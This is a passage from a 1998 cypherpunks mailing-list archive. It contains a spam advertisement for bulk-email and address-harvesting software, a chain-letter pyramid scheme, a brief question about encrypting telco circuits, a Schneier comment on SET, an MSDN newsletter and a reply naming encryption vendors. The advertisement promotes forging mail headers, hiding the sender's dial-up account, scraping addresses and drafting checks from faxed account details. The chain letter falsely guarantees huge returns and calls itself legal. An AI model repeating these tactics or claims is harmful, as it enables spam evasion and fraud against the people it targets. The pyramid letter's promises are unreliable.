13. CompuServe Form Profiles (Forum Membership Directories): Easy to build targeted lists here. Each search can easily bring you 500+
addresses.

14. Genie Profiles: If you're building targeted lists, you'll get a lot of addresses very quickly from Genie.

15. Plain Addresses: Read Floodgate Master Files back into Floodgate to merge files and do selective mailings. Also useful for the management of email address lists that you might purchase.

Floodgate also has filters to allow you to include or exclude any groups of addresses in your final distribution lists. For example, you could include only email addresses that ended in .com or exclude all with .gov. You could exclude all noc, root, and other addresses that almost guarantee a negative response. These filters are fully configurable and can be used together.

BUILD REUSABLE MASTER FILES

Floodgate maintains Master Files for each of your marketing letters. If you download from the same place on a regular basis, you only want to send your letter to the new people. Floodgate will compare the new addresses with those in the Master File, and prepare a mailing list of only new people. The new addresses are, of course, then added to the Master File. With each new mailing your Master File grows and grows.

You may create as many Master Lists as you need. When you start a new marketing campaign, you'll want to send your new letter to everyone on your Master List. If you write a newsletter, each time you send your newsletter, you'll send it to everyone on a Master List.

THE REMOVE LIST

Very often, people will reply and tell you to take them off your mailing list. Place these addresses in the REMOVE.MST file and they will never receive another letter from you again. In this way, you will be operating your business with the most professionalism
possible.

DON'T BE FOOLED

We have some new competitors that have tried to copy Floodgate. The following list describes why Floodgate is BETTER.......

**Floodgate is a mature, bug free product. Not an initial release.
**Floodgate comes with over 100 pages of step by step       documentation.
**Floodgate is the only one offering a money back guarantee.
**Floodgate has more testimonials. 
**Filter for filter, Floodgate offers more capabilities, way more. 
**Floodgate does everything all the others *combined* claim. 
**Floodgate is by far the easiest to use.
**There is NO *cutting and pasting* with Floodgate. 
**We have by far, the BEST technical support.

SOME QUICK MATH

Floodgate can pay for itself in a few days. It can also cut your advertising costs down to almost nothing. Think of what the competition will do when they get their Floodgate program. Don't be left in the dust - there are 75 million people out there, just a few keystrokes away. Let's do the math:

- Email 50,000 sales letters (takes about 1-2 hours)
- Let's say your product will bring you $5 profit per   sale.
- Let's also say you only get a 1% response(occasionally higher).

* That's 500 orders x $5 = $2,500 profit !! Now imagine what 500,000 letters would do for your business !!

WHAT CAN I MARKET ON-LINE?

You can market anything on-line using direct email, that can be marketed using conventional postal direct mail marketing. The possibilities are practically endless. If it sells off-line, you can sell it on-line.

EASY TO INSTALL AND EASY TO LEARN

The Floodgate Email Loader requires Windows. The SUPPLIED MANUAL tells you where to go, what to do, and how to do it. All you need are basic computer skills that can be learned with a little practice or help from our computer savvy technicians.

PROGRAM #2: GOLDRUSH STEALTH MASS MAILER

Do not get this program confused with other slow speed programs that call themselves "STEALTH". This program is the only one in the world that can send email out at HIGH SPEEDS with one single connection to the internet. 

This is NEW, Cutting Edge Email Technology. First Of It's Kind.. The Most Powerful BULK EMAIL SENDER In The World.. NOTHING CAN EVEN COME CLOSE! 

Thanks to our top programmer's, this technology is NOW available and we are the only place you can get it from! 

     *ONLY "ONE" DIAL-UP OR ISDN CONNECTION NEEDED. 
     *NO MORE TERMINATED CONNECTIONS. 
     *NO MORE WAITING TO SEND LARGE AMOUNTS OF EMAIL. 
     *IMMEDIATE RESPONSE TO YOUR MASS MAILINGS. 
     *YOU WILL HAVE ALL THE CONTROL AND CONFIDENCE OF 
       SENDING EMAIL THE WAY IT SHOULD BE SENT... IN HUGE AMOUNTS! 
     *SEND YOUR WHOLE LIST IN ONE DAY, WHETHER IT BE 500,000 
       OR 5 MILLION - AND JUST SIT BACK AND WAIT FOR YOUR 
       ORDERS TO POUR IN. 
     *NO MORE DOWNLOADING UNDELIVERABLE NAMES.

Bulk Emailer's Dream Come True!!! - >>>GOLDRUSH STEALTH MASS MAILER<<< 

Connect to multiple mail servers (20 or more), make multiple connections to a single server or any combination of the two ( All Simultaneously ) with one single dial-up connection. 

SEND MULTIPLE SIMULTANEOUS MAILINGS... 

View complete details about your mailings. Shows each server your connected to, the status of that connection, how many messages are going out through that connection, etc...

We show you ALL the tricks all the mass e-mailers don't want you to know... 

Here are just a few features the GOLDRUSH STEALTH MASS MAILER offers to you... 

     *Forge the Header - Message ID - ISP's will Spin their wheels. 
     *Add's a Bogus Authenticated Sender to the Header. 
     *Add's a complete bogus Received From / Received By line with 
      real time / date stamp and recipient to the Header. 
     *Does NOT require a valid POP Account be entered in order to 
      send your mailings. 
     *Easy to use and operate 
     *Plus much more! 

All this, at speeds of up to 1,000's messages/hour
(28.8k modem). 

SPECIAL INTRODUCTORY PRICE... 

NOW YOU CAN HAVE BOTH THE FLOODGATE AND 
GOLDRUSH STEALTH MASS MAILER FOR JUST $499.00! 

UPDATE ... SAVE $149.05 AND ORDER NOW, BE ONE OF THE FIRST 100 ORDERS! 

Step up to the plate and play with the big boys TODAY and receive the COMPLETE 2 SOFTWARE PACKAGE for the unbelievably low price of ONLY $349.95! 

(Other bulk email software has sold for as much as $2,500 and can't even come close to the cutting edge technology of EASE, ACCURACY AND SPEED ... SPEED ... SPEED!) 

Try the Goldrush Stealth Mass Mailer & Floodgate Bulk Email Loader for 10 days FREE. 
And receive UNLIMITED technical support for 30 days.

**************************************************************

		68+ MILLION  EMAIL ADDRESSES
	MILLIONS AND MILLIONS OF EMAIL ADDRESSES

CD with 68+ MILLION email addresses separated by domain name.
All addresses are simple text format one per line. Addresses
from the following domains: MCI, Delphi, Compuserve, Internet, .com & .net,  MILLIONS OF THEM! Not available on diskette or download.

===> WANT THE 68+ MILLION ADDRESSES FOR $100.00? <===

Just buy our Floodgate / Goldrush software package (with ALL
the bonuses INCLUDED), and the MILLIONS of addresses are yours
for just $100.00 additional.

These addresses will be delivered to you in simple text files
that any bulk emailing program can use, on CD Rom. With this CD,
YOU CAN BEGIN MAKING MONEY IMMEDIATELY!!!

***************************************************************

***SPECIAL BONUS #1:*** STOP Losing ISP Dial Up Accounts! 

If you order The FLOODGATE / GOLDRUSH software within the next 5 days - When you receive your program, you will also receive: 

*Complete instructions on "how to keep your dial up account from  showing up in the header", plus everything you will need to get started doing this. 

IMPORTANT NOTICE! We will initially only be offering 100 copies of the program for sale, First come / First Served basis only. We are doing this because of the extreme power that these programs offer.


***SPECIAL BONUS #2*** 

When you receive your two programs, you will also receive:
OVER 250 REPRINT AND RESELL RIGHTS REPORTS YOU CAN START TO MARKET
AND MAKE MONEY IMMEDIATELY!!! 

     These HOT sellers include: 
     1) How to Get a Top Rating in the Search Engines 
     2) 70 Money Making Reports 
     3) 75 MONEY MAKING PLANS & TRADE SECRETS and MUCH MUCH MORE!!!  
         ($200 RETAIL VALUE - FREE!!!) 


***SPECIAL BONUS #3***

With your two software programs, you will also receive our NEW "Address Grabber" utility program that enables you to grab 100's of THOUSANDS of email addresses from
newsgroups in minutes ($100 RETAIL VALUE - FREE).


***SPECIAL BONUS #4***

RECEIVE CHECKS BY EMAIL, PHONE OR FAX MACHINE. With this software
program, you can receive payment for your product or service INSTANTLY!!
There is no more waiting for your customers chec to arrive. This
software will no doubt, add to your sales, for customers who
don't have credit cards, as well as the impulse buyers.

With this software, you can print up your payments as soon as your
customer gives you his/her checking information. You will then
add the information given, to the proper blank check spaces, then
just print and go to the bank!!

         ***************************************************

To get your FREE demo and "test drive" our state-of-the-art software, 
email us your request by hitting reply and typing "flood"
in the subject of your letter.

         ****************************************************

              HURRY ... RESERVE YOURS TODAY! 

So, if you are interested in taking advantage of the most powerful bulk 
email software in the world and start making money hand over fist.....

Print out the EZ ORDER form below and FAX or MAIL it to our office.

If you have any questions don't hesitate to call us at: 1-954-784-0312

SYSTEM REQUIREMENTS

386 or larger
Windows 95 OR Windows 3.1 with 8 meg ram
Extra 5 MB hard drive space

Floodgate & Goldrush can be run on a fast Mac with 24 MB RAM and SoftWindows.

NOTES FROM SATISFIED USERS

"It is everything you said it was. Within one week of my first mailing, I received a record number of orders. All you need to print money is a decent sales letter. Thanks." Randy albertson, Wolverine Capital.

"After using Floodgate and your utility program all day today, let me say these are as two of the finest programs I have ever bought in my 52 years! Your support has been superb. Thank You!" Vernon Hale, Prime Data Systems

"My first day and I just used Floodgate and Pegasus to send 1,469 sales letters. So far I've got about 25 positive responses. It works GREAT!!! Thanks." Donald Prior

"Floodgate is awesome!. I recently started a new business on-line. I stripped the addresses of the AOL & CIS classifieds. I sent out 3,497 email letters and got over 400 people to join my company in 5 days! Needless to say, it pays for itself." David Sheeham, OMPD

"I was able to use Floodgate to extract the names from the Internet news groups. It works perfectly. Needless to say, I am very excited about the use of this new technology." Mark Eberra, Inside Connections

"This is a great piece of software and an invaluable marketing tool." Joe Kuhn, The Millennium Group

"I just thought you'd like to know that this program is fantastic. After loading it on my system, I wanted to test it out. In my first hour of using this, I collected 6,092 email addresses!" Richard Kahn, LD Communications

"I just love the Floodgate program. It saves me hours and hours of time. This is the beginning of a wonderful FUN time marketing on-line. Thank you so much for writing this program." Beth O'Neill, Eudora, KS

"Your software is brilliant, and from the technical support I've received, I can see you have a genuine love and respect of people...Floodgate is a divine package. Wish I had found it sooner." Tom Sanders, Peoria, IL

"I really like the way the Floodgate software package works. It is very easy to use, and really does the trick. It has already saved me an incredible amount of time and energy." John Berning, Jr., Fairfield, NJ

"It's going great with FLOODGATE! I like using Delphi. I just collected 50,000+ addresses within 20 minutes on-line." Richard Kahn, R&B Associates

-------------------------------------------------
E-Z ORDER FORM:

Please print out this order form and fill in the blanks......
Please send order form and check or money order, payable to:

Dave Mustachi
P.O. Box 772261
Coral Springs, FL 33077-2261
(954) 784-0312


______Yes! I would like to try your cutting-edge software so that I can advertise my business to thousands of people on-line whenever I like! I understand that I have 10 days to trial the software. If I am not fully delighted, I will cheerfully be refunded the purchase price, no questions asked! Please rush me the FLOODGATE and GOLDRUSH package now!

______I am ordering within 72 hours! That qualifies me to receive the FLOODGATE and GOLDRUSH package at a substantial discount! I am ordering BOTH software packages for only $349.95. (Save $150 off the retail price....Software has sold for as much as $2,499.95)

______I am ordering within 72 hours! That qualifies me to receive UNLIMITED technical support for 30 days.

______I want to receive the package OVERNIGHT. I'm including $18.00 for shipping charges.

______I want to receive the package 2nd DAY. I'm including $10.00 (includes insurance & return receipt) for shipping charges.

______I'm ordering Floodgate / Goldrush software and want to order the 68+ MILLION email addresses as well. My additional cost is $100.00 enclosed.

______I'm NOT ordering your Floodgate / Goldrush software, but I
want to order your 40 MILLION email addresses on CD. Enclosed is $249.00.

______I'm ordering your "BULK FRIENDLY" web hosting offer. Add
$145 to this order ($45 PLUS $100 one time setup fee)

I authorize Dave Mustachi to draft $45.00 per month from my
checking account from the enclosed check OR charge my credit
card account below each month for the service of hosting my
BULK FRIENDLY web page that I can use in my BULK EMAIL
marketing letter(s).


Signature:____________________________________________

	****************************************************
If you're interested in our "BULK FRIENDLY ISP", please call:

Russell Rockefeller 1-905-714-7510 for details.

	****************************************************

(CHECKS: ALLOW 1 WEEK FOR BANK CLEARANCE)


YOUR NAME_________________________________________________

COMPANY NAME_________________________________________________

YOUR POSITION_____________________________________________

STREET ADDRESS______________________________________________

CITY, STATE, ZIP____________________________________________

PHONE NUMBERS_______________________________________________

FAX NUMBERS_________________________________________________

EMAIL ADDRESSES_____________________________________________

************************************************************

We accept Checks, Money Orders, MasterCard, Visa,
American Express. You can either mail your order to 
us OR fax your order to:

			954-572-5837
************************************************************

Today's date:_____________
 
Visa____MasterCard____American Express____Discover_______
 
Card #:____________________________________________________
 
Expiration date:___________________________________________
 
Name on card:______________________________________________
 
Billing address:___________________________________________
 
Amount to be charged: $________________


Signature:___________________________________________


I agree to pay Dave Mustachi an additional $29 fee if my check is returned for insufficient or uncollectable funds.

SIGNATURE: X________________________________DATE:_______________

Please send all order forms and check or money order to payable to:

Dave Mustachi
P.O. Box 772261
Coral Springs, FL 33077
(954) 784-0312


***************************************************

OR:

PLEASE PASTE YOUR CHECK HERE

(If you fax a check, there is no need for you to send the original check by mail. We will draft up a new check, with the exact information from your original check that you faxed to us)

Please fax the above order
form and check to: 1-954-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rdshea@12291.com
Date: Sun, 8 Mar 1998 05:02:51 -0800 (PST)
To: Friend@public.com
Subject: This is your NEW HOUSE,  or BOAT, or ROLLS ROYCE
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain



This is your NEW HOUSE,  or BOAT, or ROLLS ROYCE
THIS CAN BE YOUR BEST OF DREAMS......TRY IT!



THIS MAY BE THE MOST SIGNIFICANT LETTER 
                                      YOU WILL RECEIVE THIS YEAR!!
-----------------------------------------------------------------------
***Please,... Follow The Instructions Of This  Letter Very Carefully.       Immediately Make  A Copy,  And Read It Twice.*** 

Subject: It's Only a Game, But You Win Big Money!

Greetings, 

Hopefully my name is still on the list below. I am a retired
attorney, and about two years ago a man came to me with a letter. The
letter he brought me is basically the same as the letter in front of you
now. He asked me to verify the fact that this letter was legal. I told him
that I would review it and get back to him. When I first read the letter I
thought it was some off-the-wall idea to make money. A week later I
met again with my client to discuss the issue. I told him that the letter 
originally brought to me was not 100% legal. My client asked me to
alter the letter to make it 100% legal. I advised him to make a small 
change in the letter and it would be alright.
I was curious about the letter, so he told me how it works. I thought it
was a long shot, so I decided against participating. Before my client
left, I asked him to keep me updated as to his results. About two 
months later he called to tell me that he had received over $800,000
in cash! I didn't believe him so he asked me to try the plan and see 
for myself. I thought about it for a couple of days and decided that 
there was not much to lose. I followed the instructions exactly and 
mailed out 200 letters. Sure enough, the money started coming! 
It came slowly at first, but after three weeks I was getting more 
than I could open in a day. After about three months the money 
stopped coming. I kept a precise record of my earnings and at the
end it totaled $868,439.00.

I was earning a good living as a lawyer, but as anyone in the legal
profession will tell you, there is a lot of stress that comes with the
job. I told myself if things worked out I would retire from practice and
play golf. I decided to try the letter again, but this time I sent 500
letters out. Well, three months later I had totaled $2,344,178.00!!! I
just couldn't believe it. I met my old client for lunch to find out how
this exactly works. He told me that there were a few similar letters 
going around. What made this one different is the fact that there are
six names on the letter, not five like most others. That fact alone
resulted in far more returns. The other factor was the advice I gave
him in making sure the whole thing was perfectly legal, since no one
wants to risk doing anything illegal.
                               
I bet by now you are curious about what little change I told him to
make. Well, if you send a letter like this out, to be legal, you must sell
something if you expect to receive a dollar. I told him that anyone
sending a dollar out must receive something in return. So when you 
send a dollar to each of the six names on the list, you must include a 
slip of paper saying, "Please put me on your mailing list" and include 
your name, mailing address, and email address. (Your phone # is optional).
This is the key to the program! The item you will receive for a dollar you 
send to the six names below, is this letter and the right to earn thousands. 
We will be working together to improve each others lives!

Follow the simple instructions below exactly, and in less than three
months you will receive over $800,000.00 GUARANTEED!!!!!!

A)  Immediately send $1.00 to each of the six people on the list below.
Wrap the dollar in a note (type written or handwritten) saying
"Please add me to your mailing list" and include your name, 
mailing address, and email address. Your phone number is optional:

1) Anthony Thomas  8150 East Hildale St.  Detroit, MI  48234
2) Claudia Stephan PO Box 1819 Carmichael, CA 95609
3) Anita Volsh PO Box 2408 Fair Oaks, CA 95628
4) Nadia Segun PO Box 1357 Rancho Cordova, CA 95741
5) Lidia Zoring  3500 Data dr. # 147 Rancho Cordova, CA 95670
6) James Thomas 11329 S Peoria St. Chicago, IL 60643


B) Remove the name next to #1 on the list and move the rest of the names
up one position. Then place your name in the #6 spot. This is best done by
typing a new list and taping or gluing it over the old one. Or by saving
this to a text file and editing it yourself and saving the new edited 
copy.

C) When you have completed the above instructions, you have an option
of mailing your new letter out in two ways: 1) Through the U.S. Postal
Service or 2) through e-mail. This letter has been proven perfectly legal
for both ways as long as you follow the above instructions, because you're
purchasing membership in an exclusive mailing list . To mail this 
out over the internet, you can browse through areas and find people to 
send  this to all the time. All you have to do is cut and paste email addresses 
wherever you are on the Internet. Remember, it doesn't cost anything to 
mail on the Internet. Or you can get a Mass Mail Network to mail it
out in large volumes for you.                         

2


One that we recommend is:
Cyber Mail ($15 / 200 names) ($25 / 500 names) ($50 / 1,500 names) 
16500 North Park Dr.
Suite 413
Southfield, MI  48075
(248) 557-7778

Either way will bring big payoffs. If you 
are going to use the traditional U.S. Postal Service to do this program, 
you will want to order a minimum 200 names from a mailing list company. 
Two that have been most effective for these lists are: 

***Be sure to ask for "Opportunity Seekers" and request a list less
      than 30 days old***

S.E. Ring Mailing List ($26 / 200 names)
P.O Box 15061
Ft. Lauderdale, FL 33318 (954) 742-9519

Advon Distributors ($28 / 200 names)
P.O. Box B-11
Shelly, ID 83274 (800) 992-3866

***Keep in mind- there is no limit to the amount of names you can send 
      out.  The more names you send, the more money you'll make.
      We strongly encourage you to mail this letter to family, friends and 
      relatives as well.*** 
     

D) When your mailing list arrives, place one label on a stamped
envelope and drop it in the mail box (Be sure to send out at least 200). 
Within 90 days, you will receive over $800,000. 

E)  Keep a copy of this letter and all the names you receive. Mail it out 
again in about 6 months. But mail it to the addresses you received with 
each dollar. It will work again, only much better.

THIS IS A SERVICE AND IS 100% LEGAL !
(Refer to title 18, Section 1302 & 1342 of the U.S. Postal and Lottery 
Laws)

3                                                           
                                                          

Assume for example you get a 7.5% return rate, which is very conservative.
My first attempt was about 9.5% and my second time was over 11%.

1) When you mail out 200 letters, 15 people will send you $1.00.
2) Those 15 mail out 200 letters, and 225 people will send you $1.00
3) Those 225 mail out 200 letters, and 3,375 people will send you $1.00
4) Those 3,375 mail out 200 letters, and 50,625 people will send you $1.00
5) Those 50,625 mail out 200 letters, and 759,375 people will send you $1.00 

At this point your name drops off the list,
but so far you have received $813,615.00!!!!!

It works every time, but how well depends on how many letters you send
out. In the example above, you mailed out 200 letters, if you mailed out 500
letters, you would have received $2,006,917!! Check the math yourself,
I want you to, but I guarantee it is correct! With this kind of return,
you've got to try it. Try it once and you will do it again!!!

Just make sure you send a dollar to each of the six names on the list with
a note to be added to their mailing list. Together we will all prosper!!!!

PS  You've read this far, so let me ask you one simple question:

Q.                      What do you have to lose??
A.                       Only $ 6.00 

What you can gain is an income, like the example in this letter.
Small Risk, Small Expense, HUGE Potential Return!!!
What do you have to loose?
I invite you to join our mailing list today!!!

Don't throw this away. Keep it, think about it, and in several months you will try it!


I looked at it for over two months and then I said "it's only $6" I have to be nuts not to try it.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Conlen <meconlen@IntNet.net>
Date: Sun, 8 Mar 1998 06:03:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Telco Trafic
Message-ID: <Pine.LNX.3.95.980308085507.23342F-100000@paradox.obfuscated.net>
MIME-Version: 1.0
Content-Type: text/plain


Are their products designed to encrypt trafic across Frame Relay or
dedicated telco circuits?

					Groove on Dude
					Michael Conlen
					meconlen@intnet.com

The code was willing,
It considered your request,
But the chips were weak.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Honig" <honig@otc.net>
Date: Sun, 8 Mar 1998 10:44:19 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Schneier on SET
Message-ID: <B0000049569@webserv.otc.net>
MIME-Version: 1.0
Content-Type: text/plain



from Internet World, 2 Mar 98, "Reply to All" (reader feedback)


Credit card transactions over the Net are new, but
not overly different.

We know how to do credit card transactions where there
is no physical card: over the pohne.  And we know how to
establish a secure merchant-customer session: via SSL.
SET is a complicated, server-intensive protocol, and I have trouble
believing
 its possible to implement a two-inch-thick standard without security bugs.
 I'm not surprised merchants are so slow in acepting it.  Why bother?

[signed by Bruce Schneier]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MSDNFlash Editor <MSDNFlashEditor_001781@Newswire.Microsoft.com>
Date: Sun, 8 Mar 1998 11:28:08 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: MSDNFlash, Volume 2, Number 5, March 9, 1998
Message-ID: <899977F2DFA7D111B5A200805F3118C1020B7953@bulkengine.dns.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


*** MSDN Flash ***

A Twice-Monthly Newsletter for the Microsoft Developer Community

Visit us today on the World Wide Web at:
http://www.microsoft.com/msdn/

In this issue:

PRODUCT AND TECHNOLOGY NEWS
*Free Developer Edition of Windows NT 4.0 Workstation
*Look Out for a Special MSDN Flash
*Watch Bob Muglia's Keynote Live from Spring Internet World
*SAP Delivers Free COM Connectivity to its Systems

RESOURCES
*Mastering Chapter for MSDN Online Members
*MSDN Online Chat: HelpDesk Sample Application
*MSDN Online Chat: VBA and Office Development
*New Download for MSDN Online Members
*March/April MSDN News Now Online
*Windows 98 Resource Kit
*Introducing TechNet ITHome

EVENTS
*Web TechEd - Australia
*XML Conference
*XML Xposed
*VBITS
*Windows CE Developer Conference
*Visual C++ Developer Conference
*Visual J++ Developer Conference
*Visual FoxPro Devcon 98
*Microsoft TechEd
*Developer Events - United States
*Developer Events - Europe

MSDN FLASH TIP OF THE WEEK
*Visual J++ Developer's Journal
=================================================
PRODUCT AND TECHNOLOGY NEWS
=================================================
FREE DEVELOPER EDITION OF WINDOWS NT 4.0 WORKSTATION.
For a limited time developers can get a free Developer Edition of
Windows NT Workstation 4.0 when they buy the Professional Editions of
Visual Basic, Visual C++ or Visual Studio.  If the Enterprise Edition of
these same products are purchased, developers can get a free Developer
Edition of BackOffice Server 4.0.  Developer Editions include the full
feature set with a development and testing license; the BackOffice
license is limited to 10 simultaneous connections.  For more information
visit
http://www.microsoft.com/developer/offer

LOOK OUT FOR A SPECIAL MSDN FLASH
Watch for a special MSDN Flash update later this week to fill you in on
an exciting product announcement.

WATCH BOB MUGLIA'S KEYNOTE LIVE FROM SPRING INTERNET WORLD
Bob Muglia, Microsoft Senior Vice President, will discuss effective
business applications on the Web at Spring Internet World, Los Angeles,
CA. Watch it live on the Site Builder Network at
http://www.microsoft.com/sbnmember/sbnlive/iworld-f.htm
Wednesday, March 11 at 5:45p.m. (Pacific Time). Visit this site early to
test your NetShow player and preferred bandwidth.

SAP DELIVERS FREE COM CONNECTIVITY TO ITS SYSTEMS
Download a free beta version of the SAP DCOM Component Connector at
http://www.sap.com/bfw/dcom.htm. The connector makes it possible to
integrate the rich business rules of SAP R/3 into your applications and
solutions using Microsoft's award-winning Visual Tools and Microsoft
COM.
=================================================
RESOURCES
=================================================
MASTERING CHAPTER FOR MSDN ONLINE MEMBERS
Gain the skills you need to build dynamic, data aware, client/server Web
sites. Check out this online training module on Using Microsoft
Transaction Server from "Mastering Web Site Development using Visual
InterDev" to start learning now. For more information visit
http://www.microsoft.com/msdn/training/mastering.htm

MSDN ONLINE CHAT: HELPDESK SAMPLE APPLICATION
Tuesday, March 10, 11a.m. - noon Pacific Time
Chat about building the HelpDesk Sample Application How did the MSDN
developers build the HelpDesk sample application? What went wrong? How
did they correct it? Ask them yourself in our MSDN Online chat. For more
information visit
http://microsoft.com/msdn/newsgroups/chats.htm

If you can't make it to the chat but have a question, submit it to
msdn@microsoft.com with "MSDN Chat" as the subject line. Then check back
on MSDN Online for the transcript a day or two after the chat for the
answers.

MSDN ONLINE CHAT: OFFICE AND VBA DEVELOPMENT
Tuesday, March 17th, 11:00 am to noon Pacific Time Join Microsoft VBA
staffers for an on-line chat. You'll get a chance to pose your questions
about developing solutions with Access, Excel, Word, PowerPoint, or any
other VBA host application. Microsoft product managers, test engineers,
and software designers will be on line to provide answers and guidance,
so don't miss out. Visit
http://www.microsoft.com/msdn/newsgroups/chats.htm
for more information

NEW DOWNLOAD FOR MSDN ONLINE MEMBERS
Chili!ASP is an open, cross-platform web application environment that is
the functional equivalent of Microsoft's Active Server Pages (ASP).
Chili!ASP provides ASP functionality to Netscape, Lotus, IBM, and other
web servers on Windows NT and 95, and soon on UNIX as well. For more
information visit
http://www.microsoft.com/msdn/downloads/

MICROSOFT WINDOWS 98 BETA RESOURCE KIT 
Get a head start in evaluating Microsoft Windows 98 and reviewing the
architecture. The Microsoft Windows 98 Beta Resource Kit is the first
full technical overview. And it includes a time-limited evaluation copy
of the Beta 3 release of Windows 98. Quantities are limited. Not
available outside North America. For more information visit
http://mspress.microsoft.com/order/

MARCH/APRIL MSDN NEWS NOW ONLINE
The new issue of MSDN News is online, with articles on adding Dynamic
HTML to your VB apps, MFC for Windows CE, a new column by the esteemed
Dr. GUI and more. Visit
http://www.microsoft.com/msdn/news/devnews/

ANNOUNCING TECHNET ITHOME
If you're responsible for selecting, deploying or supporting technology
ITHome is for you. Get the latest details on new technologies,
strategies, and industry issues from leading sources, including
Microsoft, Network Computing, Information Week, New Riders Publishing,
SAMS Publishing, and more. For more information visit
http://www.microsoft.com/ithome/
=================================================
EVENTS
=================================================
MICROSOFT WEB TECHED - AUSTRALIA
March 10, Sydney
March 12, Melbourne
Microsoft Web Tech Ed will be bringing you sessions on IIS 4.0, Site
Server 3.0, Electronic Commerce, Dynamic HTML, and Data Access.  Cost is
$250 for MSDN and SBN Level 2 & 3 Members, or $350 full conference fee.
To register
http://www.microsoft.com.au/australia/sitebuilder/webteched.asp

XML, THE CONFERENCE
March 23-27, Seattle, WA
See tools that support XML today and those planned for tomorrow. For
more information visit
http://www.gca.org/conf/xmlcon98/

XML XPOSED
If you are a Web developer or using the Web for business purposes,
you'll want to learn more about XML. For more information visit
http://Xmlu.com/

VBITS SAN FRANCISCO '98
March 23-27, San Francisco, CA
Hands-on training on topics ranging from multithreading applications and
servers, to leveraging component-based solutions to the Internet or
intranet. Visit
http://www.windx.com/vbits/
for more information

REGISTER NOW FOR THE WINDOWS CE DEVELOPERS CONFERENCE
April 6-8, San Jose, CA
In-depth technical sessions will teach you all you need to know about
the latest advances in Windows CE-based devices. Attendees will receive
a complimentary Palm PC. For more information or to register visit
http://www.microsoft.com/events/windowsce/

VISUAL INTERDEV 6.0 PRE-RELEASE SEMINAR
Microsoft and 32X announce a 12-city US seminar tour for developers on
the Microsoft Visual InterDev 6.0 Web development system. Seminars begin
April 13, and all attendees will receive a beta version of Visual
InterDev 6.0.  For more information see
http://www.32x.com

MICROSOFT VISUAL C++ DEVELOPER CONFERENCE IV
April 15-17, Boston, MA
Come learn about COM and DCOM, MFC and ATL, MTS, hardcore Visual C++,
and more. For more information visit
http://www.vcdj.com/

VISUAL J++ DEVELOPER CONFERENCE
April 27 - 30, Los Angeles, CA
A technical forum on advanced Java development using Microsoft Visual
J++, this event features four tracks and 48 sessions. For more
information visit
http://www.javaconference.com/

VISUAL FOXPRO DEVCON 98
May 17-20, Orlando, FL
Come learn all about Tahoe, the next version of Microsoft Visual FoxPro
at Visual FoxPro DevCon. For more information visit
http://www.microsoft.com/vfoxpro/

MICROSOFT TECHED 98
June 1-4, New Orleans, LA
This is the definitive technical conference for building complete
solutions with Microsoft technologies. For more information or to
register visit
http://www.microsoft.com/events/teched/

MICROSOFT TECHED EUROPE 98
7-10th July, Nice Acropolis Convention Centre, France
For more information visit
http://www.eu.microsoft.com/europe/teched/

DEVELOPER EVENTS - UNITED STATES
DEVELOPER CAF HITS MICHIGAN AND OHIO
Developers' Cafe hits Michigan and Ohio in March
Learn the basics of Active Server Pages (ASP), a flexible server-side
scripting environment you can use to create and run dynamic web server
applications. See development environments including Internet
Information Server 4.0, ActiveX Data Objects and others for creating and
maintaining HTML pages. For more information visit
http://www.microsoft.com/greatlakes/events/

BOB AND LARRY'S DEVELOPER WORKSHOP SERIES
March 12, Waltham MA (event code 14776)
March 17, Farmington CT (event code 14777)
The theme in March is migration. Find out how to migrate your Visual
Basic 3 and 4 code to Visual Basic 5; how to upsize your Access
databases to SQL Server; and how to migrate your Two - Tier
Client/Server applications to the Internet. For more information visit
http://www.microsoft.com/newengland/developer/boblarry/default.asp

MICROSOFT COLLABORATION COMPUTING SEMINAR FOR DEVELOPERS
In Michigan and Ohio: Developing Applications with Collaboration Data
Objects (CDO)  and the Microsoft Exchange Scripting Agent. Get an
in-depth technical look at the tools developers have available to them
for promoting and extending collaboration among users. For more
information visit http://www.microsoft.com/greatlakes/events/

DEVELOPER EVENTS - EUROPE MICROSOFT SQL SERVER AND UNIVERSAL DATA
ACCCESS TECHNICAL CONFERENCE
March 25 - 26 Paris
March 30 - 31 Stockholm
April 2 - 3 Frankfurt
April 6 - 7 London
For more information visit
http://www.eu.microsoft.com/europe/msdn/events/sql/
=================================================
MSDN Flash Tip
=================================================
Configuring the Call Stack Window
from Visual J++ Developer's Journal

During debugging, you can configure the Call Stack Window to display
only method parameters, parameter types, or both. Viewing only the
parameter types is particularly useful when your code contains a lot of
long method names.

MSDN Online Members - we have a new Tip for you each week at
http://www.microsoft.com/msdn/
For a free issue of Visual J++ Developer's Journal visit
http://www.cobb.com/vjp/freevyer.htm
To receive the Visual J++ Developer's Journal tip of the Week in email,
visit
http://www.zdtips.com/vjp/msd-f.htm
=================================================
HOW TO JOIN THE MAILING LIST:

You received this e-mail newsletter as a result of your registration on
the Microsoft Personal Information Center. You may unsubscribe from this
newsletter, or subscribe to a variety of other informative newsletters,
by returning to the Personal Information Center,
http://register.microsoft.com/regwiz/personalinfo.asp
and changing your subscription preferences.

Alternatively, please send a reply to this e-mail with the word
"unsubscribe" as the first line in the body of the message.
=================================================
The information provided is for informational purposes only and
Microsoft Corporation and its suppliers make no warranties, either
express or implied, as to the accuracy of such information or its
fitness to be used for your particular purpose.  The entire risk of the
use of, or the results from the use of this information remains with
you.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sun, 8 Mar 1998 13:19:13 -0800 (PST)
To: Michael Conlen <cypherpunks@toad.com
Subject: Re: Telco Trafic
In-Reply-To: <Pine.LNX.3.95.980308085507.23342F-100000@paradox.obfuscated.net>
Message-ID: <3.0.5.32.19980308123545.008c6100@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:56 AM 3/8/98 -0500, Michael Conlen wrote:
>Are their products designed to encrypt trafic across Frame Relay or
>dedicated telco circuits?

There are a wide variety of products to do that.
I mainly do ATM, for which there aren't many;  there are a few
for frame relay, and there are lots for private line at low-medium speeds,
e.g. 56kbps through T1 (1.544Mbps), though not too many above T1.
Cylink is a popular vendor.

